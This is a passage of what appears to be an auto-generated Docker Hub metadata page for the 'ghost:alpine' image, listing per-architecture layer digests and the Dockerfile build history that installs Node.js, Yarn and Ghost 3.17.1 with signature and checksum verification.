Last Modified: Tue, 26 May 2020 22:49:35 GMT
Size: 2.3 MB (2302081 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:8f7828b9f2b027f87ec1ac524c0a524c3376af9bc9d471ac9a00a5cab4281efb`
Last Modified: Tue, 26 May 2020 22:49:35 GMT
Size: 283.0 B
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:236aafa1a701379b0d4348fe37cbde158990b5800fa6eb0d5d8858086d02b728`
Last Modified: Tue, 26 May 2020 23:23:09 GMT
Size: 9.8 KB (9844 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:0a759720145554c63e8281ea807c07bb518517e054ab7cc4d25f51a7b516d708`
Last Modified: Tue, 26 May 2020 23:23:08 GMT
Size: 792.1 KB (792138 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:6ed24e040f9e49c5bc510fcb3bd39bcc31aa583115aeb95071f453133f94a603`
Last Modified: Tue, 26 May 2020 23:23:16 GMT
Size: 7.0 MB (7011446 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:c25f644c1c414feaae468678e58d00b20234c34fee72b5e14a6aa942d9388fcc`
Last Modified: Tue, 26 May 2020 23:23:31 GMT
Size: 55.7 MB (55695838 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:41615772ca14edceef4a72016e279156e64a53cf1c438b027f6aab418214fe48`
Last Modified: Tue, 26 May 2020 23:23:09 GMT
Size: 545.0 B
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
### `ghost:alpine` - linux; 386
```console
$ docker pull ghost@sha256:5fc9476912f50265af9223024191e933dcae69a81c26c3cae96ec2572ba395ee
```
- Docker Version: 18.09.7
- Manifest MIME: `application/vnd.docker.distribution.manifest.v2+json`
- Total Size: **93.6 MB (93648349 bytes)**
(compressed transfer size, not on-disk size)
- Image ID: `sha256:28bf84261e716bd24b958759b3c52f18cc3689b4047ccd1a26e3e8b06d0c25d8`
- Entrypoint: `["docker-entrypoint.sh"]`
- Default Command: `["node","current\/index.js"]`
```dockerfile
# Thu, 23 Apr 2020 21:16:04 GMT
ADD file:63bd8a316cba8c404cc2e32a5120406c24aee8db3224c469a6077b941d900863 in /
# Thu, 23 Apr 2020 21:16:04 GMT
CMD ["/bin/sh"]
# Wed, 29 Apr 2020 04:47:36 GMT
ENV NODE_VERSION=12.16.3
# Wed, 29 Apr 2020 05:31:04 GMT
RUN addgroup -g 1000 node && adduser -u 1000 -G node -s /bin/sh -D node && apk add --no-cache libstdc++ && apk add --no-cache --virtual .build-deps curl && ARCH= && alpineArch="$(apk --print-arch)" && case "${alpineArch##*-}" in x86_64) ARCH='x64' CHECKSUM="af47aa64de372d9a9d16307b6af9785ee28bdf9892f1de28a78b85917dacf257" ;; *) ;; esac && if [ -n "${CHECKSUM}" ]; then set -eu; curl -fsSLO --compressed "https://unofficial-builds.nodejs.org/download/release/v$NODE_VERSION/node-v$NODE_VERSION-linux-$ARCH-musl.tar.xz"; echo "$CHECKSUM node-v$NODE_VERSION-linux-$ARCH-musl.tar.xz" | sha256sum -c - && tar -xJf "node-v$NODE_VERSION-linux-$ARCH-musl.tar.xz" -C /usr/local --strip-components=1 --no-same-owner && ln -s /usr/local/bin/node /usr/local/bin/nodejs; else echo "Building from source" && apk add --no-cache --virtual .build-deps-full binutils-gold g++ gcc gnupg libgcc linux-headers make python && for key in 94AE36675C464D64BAFA68DD7434390BDBE9B9C5 FD3A5288F042B6850C66B31F09FE44734EB7990E 71DCFD284A79C3B38668286BC97EC7A07EDE3FC1 DD8F2338BAE7501E3DD5AC78C273792F7D83545D C4F0DFFF4E8C1A8236409D08E73BC641CC11F4C8 B9AE9905FFD7803F25714661B63B535A4C206CA9 77984A986EBC2AA786BC0F66B01FBB92821C587A 8FCCA13FEF1D0C2E91008E09770F7A9A5AE15600 4ED778F539E3634C779C87C6D7062848A1AB005C A48C2BEE680E841632CD4E44F07496B3EB3C1762 B9E2F5981AA6E0CD28160D9FF13993A75599653C ; do gpg --batch --keyserver hkp://p80.pool.sks-keyservers.net:80 --recv-keys "$key" || gpg --batch --keyserver hkp://ipv4.pool.sks-keyservers.net --recv-keys "$key" || gpg --batch --keyserver hkp://pgp.mit.edu:80 --recv-keys "$key" ; done && curl -fsSLO --compressed "https://nodejs.org/dist/v$NODE_VERSION/node-v$NODE_VERSION.tar.xz" && curl -fsSLO --compressed "https://nodejs.org/dist/v$NODE_VERSION/SHASUMS256.txt.asc" && gpg --batch --decrypt --output SHASUMS256.txt SHASUMS256.txt.asc && grep " node-v$NODE_VERSION.tar.xz\$" SHASUMS256.txt | sha256sum -c - && tar -xf "node-v$NODE_VERSION.tar.xz" && cd "node-v$NODE_VERSION" && ./configure && make -j$(getconf _NPROCESSORS_ONLN) V= && make install && apk del .build-deps-full && cd .. && rm -Rf "node-v$NODE_VERSION" && rm "node-v$NODE_VERSION.tar.xz" SHASUMS256.txt.asc SHASUMS256.txt; fi && rm -f "node-v$NODE_VERSION-linux-$ARCH-musl.tar.xz" && apk del .build-deps && node --version && npm --version
# Wed, 29 Apr 2020 05:31:04 GMT
ENV YARN_VERSION=1.22.4
# Wed, 29 Apr 2020 05:31:07 GMT
RUN apk add --no-cache --virtual .build-deps-yarn curl gnupg tar && for key in 6A010C5166006599AA17F08146C2130DFD2497F5 ; do gpg --batch --keyserver hkp://p80.pool.sks-keyservers.net:80 --recv-keys "$key" || gpg --batch --keyserver hkp://ipv4.pool.sks-keyservers.net --recv-keys "$key" || gpg --batch --keyserver hkp://pgp.mit.edu:80 --recv-keys "$key" ; done && curl -fsSLO --compressed "https://yarnpkg.com/downloads/$YARN_VERSION/yarn-v$YARN_VERSION.tar.gz" && curl -fsSLO --compressed "https://yarnpkg.com/downloads/$YARN_VERSION/yarn-v$YARN_VERSION.tar.gz.asc" && gpg --batch --verify yarn-v$YARN_VERSION.tar.gz.asc yarn-v$YARN_VERSION.tar.gz && mkdir -p /opt && tar -xzf yarn-v$YARN_VERSION.tar.gz -C /opt/ && ln -s /opt/yarn-v$YARN_VERSION/bin/yarn /usr/local/bin/yarn && ln -s /opt/yarn-v$YARN_VERSION/bin/yarnpkg /usr/local/bin/yarnpkg && rm yarn-v$YARN_VERSION.tar.gz.asc yarn-v$YARN_VERSION.tar.gz && apk del .build-deps-yarn && yarn --version
# Wed, 29 Apr 2020 05:31:08 GMT
COPY file:238737301d47304174e4d24f4def935b29b3069c03c72ae8de97d94624382fce in /usr/local/bin/
# Wed, 29 Apr 2020 05:31:08 GMT
ENTRYPOINT ["docker-entrypoint.sh"]
# Wed, 29 Apr 2020 05:31:08 GMT
CMD ["node"]
# Wed, 29 Apr 2020 06:19:37 GMT
RUN apk add --no-cache 'su-exec>=0.2'
# Wed, 29 Apr 2020 06:19:38 GMT
RUN apk add --no-cache bash
# Wed, 29 Apr 2020 06:19:38 GMT
ENV NODE_ENV=production
# Tue, 26 May 2020 22:38:28 GMT
ENV GHOST_CLI_VERSION=1.14.0
# Tue, 26 May 2020 22:38:46 GMT
RUN set -eux; npm install -g "ghost-cli@$GHOST_CLI_VERSION"; npm cache clean --force
# Tue, 26 May 2020 22:38:46 GMT
ENV GHOST_INSTALL=/var/lib/ghost
# Tue, 26 May 2020 22:38:47 GMT
ENV GHOST_CONTENT=/var/lib/ghost/content
# Tue, 26 May 2020 22:38:47 GMT
ENV GHOST_VERSION=3.17.1
# Tue, 26 May 2020 22:41:56 GMT
RUN set -eux; mkdir -p "$GHOST_INSTALL"; chown node:node "$GHOST_INSTALL"; su-exec node ghost install "$GHOST_VERSION" --db sqlite3 --no-prompt --no-stack --no-setup --dir "$GHOST_INSTALL"; cd "$GHOST_INSTALL"; su-exec node ghost config --ip 0.0.0.0 --port 2368 --no-prompt --db sqlite3 --url http://localhost:2368 --dbpath "$GHOST_CONTENT/data/ghost.db"; su-exec node ghost config paths.contentPath "$GHOST_CONTENT"; su-exec node ln -s config.production.json "$GHOST_INSTALL/config.development.json"; readlink -f "$GHOST_INSTALL/config.development.json"; mv "$GHOST_CONTENT" "$GHOST_INSTALL/content.orig"; mkdir -p "$GHOST_CONTENT"; chown node:node "$GHOST_CONTENT"; cd "$GHOST_INSTALL/current"; sqlite3Version="$(node -p 'require("./package.json").optionalDependencies.sqlite3')"; if ! su-exec node yarn add "sqlite3@$sqlite3Version" --force; then apk add --no-cache --virtual .build-deps python make gcc g++ libc-dev; su-exec node yarn add "sqlite3@$sqlite3Version" --force --build-from-source; apk del --no-network .build-deps; fi; su-exec node yarn cache clean; su-exec node npm cache clean --force; npm cache clean --force; rm -rv /tmp/yarn* /tmp/v8*
# Tue, 26 May 2020 22:41:57 GMT
WORKDIR /var/lib/ghost
# Tue, 26 May 2020 22:41:57 GMT
VOLUME [/var/lib/ghost/content]
# Tue, 26 May 2020 22:41:58 GMT
COPY file:87209c4c75826f5d839c2f3270a782740f42eecf4bc96b2f6dbae79b08c17e21 in /usr/local/bin
# Tue, 26 May 2020 22:41:58 GMT
ENTRYPOINT ["docker-entrypoint.sh"]
# Tue, 26 May 2020 22:41:58 GMT
EXPOSE 2368
# Tue, 26 May 2020 22:41:58 GMT
CMD ["node" "current/index.js"]
```
- Layers:
- `sha256:2826c1e79865da7e0da0a993a2a38db61c3911e05b5df617439a86d4deac90fb`
Last Modified: Thu, 23 Apr 2020 21:16:32 GMT
Size: 2.8 MB (2808418 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:a146da8782b0a2b78256aaa25ee92fd617354f694aeace2b3951fab07b027563`
Last Modified: Wed, 29 Apr 2020 05:32:18 GMT
Size: 24.9 MB (24931595 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:25cb15e48bd1247c878221de413f1942fb7a082c5b789c0b94a025b6e8a0acfe`
Last Modified: Wed, 29 Apr 2020 05:32:12 GMT
Size: 2.3 MB (2294631 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:795a10dfdcd143e79354ce37f2fcb9dd923fbc4d3e6281f1be5c8619b654624b`
Last Modified: Wed, 29 Apr 2020 05:32:11 GMT
Size: 282.0 B
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:47c2188990e50e91234b3066f2b83b08529f15057c14fda8799fdbbedfc33fd3`
Last Modified: Wed, 29 Apr 2020 06:23:16 GMT
Size: 10.0 KB (9986 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:987839397957204c0cb5fe48a8aac315882c2895e54e2588a761de6afe65c215`
Last Modified: Wed, 29 Apr 2020 06:23:16 GMT
Size: 829.5 KB (829504 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:03e3f36c107dc02099e2a191c121e2e5d1fa5d029b81ec339073c2985d3e12c0`
Last Modified: Tue, 26 May 2020 22:46:15 GMT
Size: 7.0 MB (7011456 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:d8e59aeea5bc63e948d60446afb45bba361a30b42ca732bbcd561ab27ddb8e7f`
Last Modified: Tue, 26 May 2020 22:46:36 GMT
Size: 55.8 MB (55761930 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:ca533143b92bf4bab36ea76111b33bf54c2ced6f87500851008df141fa9cca3a`
Last Modified: Tue, 26 May 2020 22:46:08 GMT
Size: 547.0 B
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
### `ghost:alpine` - linux; ppc64le
```console
$ docker pull ghost@sha256:39f14809110ba0e6b54ae45150ea6aa8b3ec0b4ea5b554a1b451cc27ec8558ed
```
- Docker Version: 18.09.7
- Manifest MIME: `application/vnd.docker.distribution.manifest.v2+json`
- Total Size: **96.6 MB (96642603 bytes)**
(compressed transfer size, not on-disk size)
- Image ID: `sha256:890fac2a29a73f33a0a63061be342266500c6d25afa6fb4e7a714d311ae59ce9`
- Entrypoint: `["docker-entrypoint.sh"]`
- Default Command: `["node","current\/index.js"]`
```dockerfile
# Thu, 23 Apr 2020 20:39:04 GMT
ADD file:1aaebe252dfb1885e066fcbc84aaa915bae149c3608f19600855ad1d4f7450c1 in /
# Thu, 23 Apr 2020 20:39:06 GMT
CMD ["/bin/sh"]
# Wed, 27 May 2020 00:16:14 GMT
ENV NODE_VERSION=12.17.0
# Wed, 27 May 2020 00:34:27 GMT
RUN addgroup -g 1000 node && adduser -u 1000 -G node -s /bin/sh -D node && apk add --no-cache libstdc++ && apk add --no-cache --virtual .build-deps curl && ARCH= && alpineArch="$(apk --print-arch)" && case "${alpineArch##*-}" in x86_64) ARCH='x64' CHECKSUM="fbd8916cc5a3c85dc503cc1fe9606cf8860152c4e8b2f2fcc729e48db3e3d654" ;; *) ;; esac && if [ -n "${CHECKSUM}" ]; then set -eu; curl -fsSLO --compressed "https://unofficial-builds.nodejs.org/download/release/v$NODE_VERSION/node-v$NODE_VERSION-linux-$ARCH-musl.tar.xz"; echo "$CHECKSUM node-v$NODE_VERSION-linux-$ARCH-musl.tar.xz" | sha256sum -c - && tar -xJf "node-v$NODE_VERSION-linux-$ARCH-musl.tar.xz" -C /usr/local --strip-components=1 --no-same-owner && ln -s /usr/local/bin/node /usr/local/bin/nodejs; else echo "Building from source" && apk add --no-cache --virtual .build-deps-full binutils-gold g++ gcc gnupg libgcc linux-headers make python && for key in 94AE36675C464D64BAFA68DD7434390BDBE9B9C5 FD3A5288F042B6850C66B31F09FE44734EB7990E 71DCFD284A79C3B38668286BC97EC7A07EDE3FC1 DD8F2338BAE7501E3DD5AC78C273792F7D83545D C4F0DFFF4E8C1A8236409D08E73BC641CC11F4C8 B9AE9905FFD7803F25714661B63B535A4C206CA9 77984A986EBC2AA786BC0F66B01FBB92821C587A 8FCCA13FEF1D0C2E91008E09770F7A9A5AE15600 4ED778F539E3634C779C87C6D7062848A1AB005C A48C2BEE680E841632CD4E44F07496B3EB3C1762 B9E2F5981AA6E0CD28160D9FF13993A75599653C ; do gpg --batch --keyserver hkp://p80.pool.sks-keyservers.net:80 --recv-keys "$key" || gpg --batch --keyserver hkp://ipv4.pool.sks-keyservers.net --recv-keys "$key" || gpg --batch --keyserver hkp://pgp.mit.edu:80 --recv-keys "$key" ; done && curl -fsSLO --compressed "https://nodejs.org/dist/v$NODE_VERSION/node-v$NODE_VERSION.tar.xz" && curl -fsSLO --compressed "https://nodejs.org/dist/v$NODE_VERSION/SHASUMS256.txt.asc" && gpg --batch --decrypt --output SHASUMS256.txt SHASUMS256.txt.asc && grep " node-v$NODE_VERSION.tar.xz\$" SHASUMS256.txt | sha256sum -c - && tar -xf "node-v$NODE_VERSION.tar.xz" && cd "node-v$NODE_VERSION" 
&& ./configure && make -j$(getconf _NPROCESSORS_ONLN) V= && make install && apk del .build-deps-full && cd .. && rm -Rf "node-v$NODE_VERSION" && rm "node-v$NODE_VERSION.tar.xz" SHASUMS256.txt.asc SHASUMS256.txt; fi && rm -f "node-v$NODE_VERSION-linux-$ARCH-musl.tar.xz" && apk del .build-deps && node --version && npm --version
# Wed, 27 May 2020 00:34:33 GMT
ENV YARN_VERSION=1.22.4
# Wed, 27 May 2020 00:34:46 GMT
RUN apk add --no-cache --virtual .build-deps-yarn curl gnupg tar && for key in 6A010C5166006599AA17F08146C2130DFD2497F5 ; do gpg --batch --keyserver hkp://p80.pool.sks-keyservers.net:80 --recv-keys "$key" || gpg --batch --keyserver hkp://ipv4.pool.sks-keyservers.net --recv-keys "$key" || gpg --batch --keyserver hkp://pgp.mit.edu:80 --recv-keys "$key" ; done && curl -fsSLO --compressed "https://yarnpkg.com/downloads/$YARN_VERSION/yarn-v$YARN_VERSION.tar.gz" && curl -fsSLO --compressed "https://yarnpkg.com/downloads/$YARN_VERSION/yarn-v$YARN_VERSION.tar.gz.asc" && gpg --batch --verify yarn-v$YARN_VERSION.tar.gz.asc yarn-v$YARN_VERSION.tar.gz && mkdir -p /opt && tar -xzf yarn-v$YARN_VERSION.tar.gz -C /opt/ && ln -s /opt/yarn-v$YARN_VERSION/bin/yarn /usr/local/bin/yarn && ln -s /opt/yarn-v$YARN_VERSION/bin/yarnpkg /usr/local/bin/yarnpkg && rm yarn-v$YARN_VERSION.tar.gz.asc yarn-v$YARN_VERSION.tar.gz && apk del .build-deps-yarn && yarn --version
# Wed, 27 May 2020 00:34:48 GMT
COPY file:238737301d47304174e4d24f4def935b29b3069c03c72ae8de97d94624382fce in /usr/local/bin/
# Wed, 27 May 2020 00:34:49 GMT
ENTRYPOINT ["docker-entrypoint.sh"]
# Wed, 27 May 2020 00:34:53 GMT
CMD ["node"]
# Wed, 27 May 2020 00:57:44 GMT
RUN apk add --no-cache 'su-exec>=0.2'
# Wed, 27 May 2020 00:57:53 GMT
RUN apk add --no-cache bash
# Wed, 27 May 2020 00:57:55 GMT
ENV NODE_ENV=production
# Wed, 27 May 2020 00:57:57 GMT
ENV GHOST_CLI_VERSION=1.14.0
# Wed, 27 May 2020 00:58:26 GMT
RUN set -eux; npm install -g "ghost-cli@$GHOST_CLI_VERSION"; npm cache clean --force
# Wed, 27 May 2020 00:58:30 GMT
ENV GHOST_INSTALL=/var/lib/ghost
# Wed, 27 May 2020 00:58:31 GMT
ENV GHOST_CONTENT=/var/lib/ghost/content
# Wed, 27 May 2020 00:58:36 GMT
ENV GHOST_VERSION=3.17.1
# Wed, 27 May 2020 01:02:38 GMT
RUN set -eux; mkdir -p "$GHOST_INSTALL"; chown node:node "$GHOST_INSTALL"; su-exec node ghost install "$GHOST_VERSION" --db sqlite3 --no-prompt --no-stack --no-setup --dir "$GHOST_INSTALL"; cd "$GHOST_INSTALL"; su-exec node ghost config --ip 0.0.0.0 --port 2368 --no-prompt --db sqlite3 --url http://localhost:2368 --dbpath "$GHOST_CONTENT/data/ghost.db"; su-exec node ghost config paths.contentPath "$GHOST_CONTENT"; su-exec node ln -s config.production.json "$GHOST_INSTALL/config.development.json"; readlink -f "$GHOST_INSTALL/config.development.json"; mv "$GHOST_CONTENT" "$GHOST_INSTALL/content.orig"; mkdir -p "$GHOST_CONTENT"; chown node:node "$GHOST_CONTENT"; cd "$GHOST_INSTALL/current"; sqlite3Version="$(node -p 'require("./package.json").optionalDependencies.sqlite3')"; if ! su-exec node yarn add "sqlite3@$sqlite3Version" --force; then apk add --no-cache --virtual .build-deps python make gcc g++ libc-dev; su-exec node yarn add "sqlite3@$sqlite3Version" --force --build-from-source; apk del --no-network .build-deps; fi; su-exec node yarn cache clean; su-exec node npm cache clean --force; npm cache clean --force; rm -rv /tmp/yarn* /tmp/v8*
# Wed, 27 May 2020 01:02:45 GMT
WORKDIR /var/lib/ghost
# Wed, 27 May 2020 01:02:48 GMT
VOLUME [/var/lib/ghost/content]
# Wed, 27 May 2020 01:02:49 GMT
COPY file:87209c4c75826f5d839c2f3270a782740f42eecf4bc96b2f6dbae79b08c17e21 in /usr/local/bin
# Wed, 27 May 2020 01:02:51 GMT
ENTRYPOINT ["docker-entrypoint.sh"]
# Wed, 27 May 2020 01:02:55 GMT
EXPOSE 2368
# Wed, 27 May 2020 01:02:59 GMT
CMD ["node" "current/index.js"]
```
- Layers:
- `sha256:9a8fdc5b698322331ee7eba7dd6f66f3a4e956554db22dd1e834d519415b4f8e`
Last Modified: Thu, 23 Apr 2020 20:41:33 GMT
Size: 2.8 MB (2821843 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:84e2529b9fce5ca7dcc3e1d316618c522c77b97a5e727c8503a99bae0b4d9226`
Last Modified: Wed, 27 May 2020 00:40:30 GMT
Size: 27.0 MB (27027517 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:b2d452b247f39d6703a1720c556363c64284c4050d6a2edb625d1bba454df1d8`
Last Modified: Wed, 27 May 2020 00:40:22 GMT
Size: 2.3 MB (2302012 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:750ca7c7b76ad88a9365bb8c82b462b4363a88599b463446ab50b6a644010128`
Last Modified: Wed, 27 May 2020 00:40:21 GMT
Size: 281.0 B
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:d3c227fbca15f32bbf20a1685f34b15e39b23f0db200a1bed9adb7302cdd117b`
Last Modified: Wed, 27 May 2020 01:04:38 GMT
Size: 10.4 KB (10403 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:6be9b179a56050b198e036667ea65c87aea4a5824e7863dd70c163a7e545f2aa`
Last Modified: Wed, 27 May 2020 01:04:38 GMT
Size: 862.6 KB (862606 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:7077e534c4b2192014aa6ee226b3dae8dc71a6ac8b0e95115a5f4fb290b82c62`
Last Modified: Wed, 27 May 2020 01:04:41 GMT
Size: 7.0 MB (7011377 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:2c86ff1ec1ef1704444877de227be31e043f99192d4facea6ae4b56b3c3bd703`
Last Modified: Wed, 27 May 2020 01:04:55 GMT
Size: 56.6 MB (56606023 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:9415dd544bdaf2862d2102e83aedd31046485fa74d72c9aaa08bacacf221d651`
Last Modified: Wed, 27 May 2020 01:04:37 GMT
Size: 541.0 B
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
### `ghost:alpine` - linux; s390x
```console
$ docker pull ghost@sha256:a14eb53795ddd4d6b37c4c04865ab6c4320fd949b3248b2702f2697f88b3774b
```
- Docker Version: 18.09.7
- Manifest MIME: `application/vnd.docker.distribution.manifest.v2+json`
- Total Size: **93.1 MB (93101436 bytes)**
(compressed transfer size, not on-disk size)
- Image ID: `sha256:e7207f8adad6e2e432c16b1572c1fbb40144c74d5c0413e69c187821cd2f4edb`
- Entrypoint: `["docker-entrypoint.sh"]`
- Default Command: `["node","current\/index.js"]`
```dockerfile
# Thu, 23 Apr 2020 17:50:57 GMT
ADD file:a59a30c2fd43c9f3b820751a6f5a54688c14440a1ddace1ab255475f46e6ba2d in /
# Thu, 23 Apr 2020 17:50:58 GMT
CMD ["/bin/sh"]
# Tue, 26 May 2020 22:36:22 GMT
ENV NODE_VERSION=12.17.0
# Tue, 26 May 2020 22:57:51 GMT
RUN addgroup -g 1000 node && adduser -u 1000 -G node -s /bin/sh -D node && apk add --no-cache libstdc++ && apk add --no-cache --virtual .build-deps curl && ARCH= && alpineArch="$(apk --print-arch)" && case "${alpineArch##*-}" in x86_64) ARCH='x64' CHECKSUM="fbd8916cc5a3c85dc503cc1fe9606cf8860152c4e8b2f2fcc729e48db3e3d654" ;; *) ;; esac && if [ -n "${CHECKSUM}" ]; then set -eu; curl -fsSLO --compressed "https://unofficial-builds.nodejs.org/download/release/v$NODE_VERSION/node-v$NODE_VERSION-linux-$ARCH-musl.tar.xz"; echo "$CHECKSUM node-v$NODE_VERSION-linux-$ARCH-musl.tar.xz" | sha256sum -c - && tar -xJf "node-v$NODE_VERSION-linux-$ARCH-musl.tar.xz" -C /usr/local --strip-components=1 --no-same-owner && ln -s /usr/local/bin/node /usr/local/bin/nodejs; else echo "Building from source" && apk add --no-cache --virtual .build-deps-full binutils-gold g++ gcc gnupg libgcc linux-headers make python && for key in 94AE36675C464D64BAFA68DD7434390BDBE9B9C5 FD3A5288F042B6850C66B31F09FE44734EB7990E 71DCFD284A79C3B38668286BC97EC7A07EDE3FC1 DD8F2338BAE7501E3DD5AC78C273792F7D83545D C4F0DFFF4E8C1A8236409D08E73BC641CC11F4C8 B9AE9905FFD7803F25714661B63B535A4C206CA9 77984A986EBC2AA786BC0F66B01FBB92821C587A 8FCCA13FEF1D0C2E91008E09770F7A9A5AE15600 4ED778F539E3634C779C87C6D7062848A1AB005C A48C2BEE680E841632CD4E44F07496B3EB3C1762 B9E2F5981AA6E0CD28160D9FF13993A75599653C ; do gpg --batch --keyserver hkp://p80.pool.sks-keyservers.net:80 --recv-keys "$key" || gpg --batch --keyserver hkp://ipv4.pool.sks-keyservers.net --recv-keys "$key" || gpg --batch --keyserver hkp://pgp.mit.edu:80 --recv-keys "$key" ; done && curl -fsSLO --compressed "https://nodejs.org/dist/v$NODE_VERSION/node-v$NODE_VERSION.tar.xz" && curl -fsSLO --compressed "https://nodejs.org/dist/v$NODE_VERSION/SHASUMS256.txt.asc" && gpg --batch --decrypt --output SHASUMS256.txt SHASUMS256.txt.asc && grep " node-v$NODE_VERSION.tar.xz\$" SHASUMS256.txt | sha256sum -c - && tar -xf "node-v$NODE_VERSION.tar.xz" && cd "node-v$NODE_VERSION" 
&& ./configure && make -j$(getconf _NPROCESSORS_ONLN) V= && make install && apk del .build-deps-full && cd .. && rm -Rf "node-v$NODE_VERSION" && rm "node-v$NODE_VERSION.tar.xz" SHASUMS256.txt.asc SHASUMS256.txt; fi && rm -f "node-v$NODE_VERSION-linux-$ARCH-musl.tar.xz" && apk del .build-deps && node --version && npm --version
# Tue, 26 May 2020 22:57:55 GMT
ENV YARN_VERSION=1.22.4
# Tue, 26 May 2020 22:58:00 GMT
RUN apk add --no-cache --virtual .build-deps-yarn curl gnupg tar && for key in 6A010C5166006599AA17F08146C2130DFD2497F5 ; do gpg --batch --keyserver hkp://p80.pool.sks-keyservers.net:80 --recv-keys "$key" || gpg --batch --keyserver hkp://ipv4.pool.sks-keyservers.net --recv-keys "$key" || gpg --batch --keyserver hkp://pgp.mit.edu:80 --recv-keys "$key" ; done && curl -fsSLO --compressed "https://yarnpkg.com/downloads/$YARN_VERSION/yarn-v$YARN_VERSION.tar.gz" && curl -fsSLO --compressed "https://yarnpkg.com/downloads/$YARN_VERSION/yarn-v$YARN_VERSION.tar.gz.asc" && gpg --batch --verify yarn-v$YARN_VERSION.tar.gz.asc yarn-v$YARN_VERSION.tar.gz && mkdir -p /opt && tar -xzf yarn-v$YARN_VERSION.tar.gz -C /opt/ && ln -s /opt/yarn-v$YARN_VERSION/bin/yarn /usr/local/bin/yarn && ln -s /opt/yarn-v$YARN_VERSION/bin/yarnpkg /usr/local/bin/yarnpkg && rm yarn-v$YARN_VERSION.tar.gz.asc yarn-v$YARN_VERSION.tar.gz && apk del .build-deps-yarn && yarn --version
# Tue, 26 May 2020 22:58:00 GMT
COPY file:238737301d47304174e4d24f4def935b29b3069c03c72ae8de97d94624382fce in /usr/local/bin/
# Tue, 26 May 2020 22:58:00 GMT
ENTRYPOINT ["docker-entrypoint.sh"]
# Tue, 26 May 2020 22:58:01 GMT
CMD ["node"]
# Tue, 26 May 2020 23:05:59 GMT
RUN apk add --no-cache 'su-exec>=0.2'
# Tue, 26 May 2020 23:06:01 GMT
RUN apk add --no-cache bash
# Tue, 26 May 2020 23:06:01 GMT
ENV NODE_ENV=production
# Tue, 26 May 2020 23:06:02 GMT
ENV GHOST_CLI_VERSION=1.14.0
# Tue, 26 May 2020 23:06:24 GMT
RUN set -eux; npm install -g "ghost-cli@$GHOST_CLI_VERSION"; npm cache clean --force
# Tue, 26 May 2020 23:06:28 GMT
ENV GHOST_INSTALL=/var/lib/ghost
# Tue, 26 May 2020 23:06:28 GMT
ENV GHOST_CONTENT=/var/lib/ghost/content
# Tue, 26 May 2020 23:06:29 GMT
ENV GHOST_VERSION=3.17.1
# Tue, 26 May 2020 23:08:53 GMT
RUN set -eux; mkdir -p "$GHOST_INSTALL"; chown node:node "$GHOST_INSTALL"; su-exec node ghost install "$GHOST_VERSION" --db sqlite3 --no-prompt --no-stack --no-setup --dir "$GHOST_INSTALL"; cd "$GHOST_INSTALL"; su-exec node ghost config --ip 0.0.0.0 --port 2368 --no-prompt --db sqlite3 --url http://localhost:2368 --dbpath "$GHOST_CONTENT/data/ghost.db"; su-exec node ghost config paths.contentPath "$GHOST_CONTENT"; su-exec node ln -s config.production.json "$GHOST_INSTALL/config.development.json"; readlink -f "$GHOST_INSTALL/config.development.json"; mv "$GHOST_CONTENT" "$GHOST_INSTALL/content.orig"; mkdir -p "$GHOST_CONTENT"; chown node:node "$GHOST_CONTENT"; cd "$GHOST_INSTALL/current"; sqlite3Version="$(node -p 'require("./package.json").optionalDependencies.sqlite3')"; if ! su-exec node yarn add "sqlite3@$sqlite3Version" --force; then apk add --no-cache --virtual .build-deps python make gcc g++ libc-dev; su-exec node yarn add "sqlite3@$sqlite3Version" --force --build-from-source; apk del --no-network .build-deps; fi; su-exec node yarn cache clean; su-exec node npm cache clean --force; npm cache clean --force; rm -rv /tmp/yarn* /tmp/v8*
# Tue, 26 May 2020 23:09:04 GMT
WORKDIR /var/lib/ghost
# Tue, 26 May 2020 23:09:04 GMT
VOLUME [/var/lib/ghost/content]
# Tue, 26 May 2020 23:09:04 GMT
COPY file:87209c4c75826f5d839c2f3270a782740f42eecf4bc96b2f6dbae79b08c17e21 in /usr/local/bin
# Tue, 26 May 2020 23:09:05 GMT
ENTRYPOINT ["docker-entrypoint.sh"]
# Tue, 26 May 2020 23:09:05 GMT
EXPOSE 2368
# Tue, 26 May 2020 23:09:06 GMT
CMD ["node" "current/index.js"]
```
- Layers:
- `sha256:7184c046fdf17da4c16ca482e5ede36e1f2d41ac8cea9c036e488fd149d6e8e7`
Last Modified: Thu, 23 Apr 2020 17:51:38 GMT
Size: 2.6 MB (2582859 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:99e2156401d0b9994bb97f6452e09d37e340162d6b2d219e1046554e29ba89d1`
Last Modified: Tue, 26 May 2020 23:01:43 GMT
Size: 24.8 MB (24787836 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:3f36bb1dc8adf3d4deb052d28dd10963378d964d41bcca9ac3091f29c9c6d4ee`
